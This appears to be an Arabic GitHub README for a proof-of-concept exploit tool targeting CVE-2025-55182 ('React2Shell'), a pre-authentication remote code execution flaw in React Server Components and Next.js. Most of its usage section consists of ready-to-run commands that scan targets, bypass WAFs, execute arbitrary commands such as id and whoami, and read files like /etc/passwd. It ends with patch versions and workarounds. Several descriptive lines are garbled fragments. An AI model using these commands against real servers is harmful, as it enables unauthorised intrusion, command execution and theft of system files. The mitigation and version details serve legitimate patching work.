
استغلال RCE قبل المصادقة لـ CVE-2025-55182 (React2Shell) يستهدف مكونات خادم React. يتضمن المسح، التحقق من OAST، تجاوز WAF، تنفيذ الأوامر، وقراءة الملفات.
تنفيذ تعليمات برمجية عن بُعد قبل المصادقة في مكونات خادم React (RSC) و Next.js والأطر ذات الصلة.
CVE-2025-55182 (يُشار إليه أيضًا باسم React2Shell) هو ثغرة حرجة من نوع تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة تؤثر على نظام مكونات خادم React (RSC). يمكن لمهاجم غير موثَّق اختراق خادم ضعيف بالكامل من خلال طلب HTTP POST واحد مصمم بعناية.
تستخدم مكونات خادم React تنسيقًا مخصصًا للأسلاك يُسمى React Flight لتسلسل مراجع الدوال واستدعاءات الوحدات. توجد الثغرة في آلية فك ترميز الحمولة التي تعالج طلبات POST الواردة إلى نقاط نهاية RSC.
عندما يتلقى الخادم حمولة React Flight، فإنه يُفك تسلسل المحتوى دون التحقق الكافي، مع الثقة في حقول $$typeof التي يتحكم بها المهاجم وحل مراجع الوحدات. يسمح هذا للمهاجم بما يلي:
child_process و fs و net)$F (دالة)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical
id، whoami)./etc/passwd، package.json).git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt
الاستخدام
مسح أساسي
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json
التحقق من RCE باستخدام OAST
python3 poc.py -t https://target.com -m verify --oast your.oast.domain
اختبار التجاوز الكامل
python3 poc.py -t https://target.com -m bypass --verbose
تنفيذ الأوامر
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20
قراءة الملفات
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"
استخدام وكيل (مثل Burp Suite)
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080
هيكل الملفات
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
├── __init__.py
├── payloads.py
├── scanner.py
├── bypass.py
└── rce.py
التخفيف
التصحيح (موصى به)
npm install [email protected]
npm install [email protected] [email protected]
حلول مؤقتة
· تعطيل وظائف الخادم ("use server") · قواعد WAF لحظر Content-Type: text/x-component · تقسيم الشبكة لنقاط نهاية RSC
المراجع
· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182
إخلاء مسؤولية: للاختبارات الأمنية المصرح بها فقط.
المؤلف: SentinelX · https://t.me/SentinelXsecurity
| الحزمة | الإصدار الضعيف | الإصدار المُصحَّح |
|---|
react-server-dom-webpack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-parcel | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-turbopack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
next (13.x) | 13.3.0 – 13.5.x | ≥ 14.2.35 |
next (14.x) | 14.0.0 – 14.2.34 | ≥ 14.2.35 |
next (15.x) | 15.0.0+ (انظر التصحيح) | الإصدارات المُصحَّحة |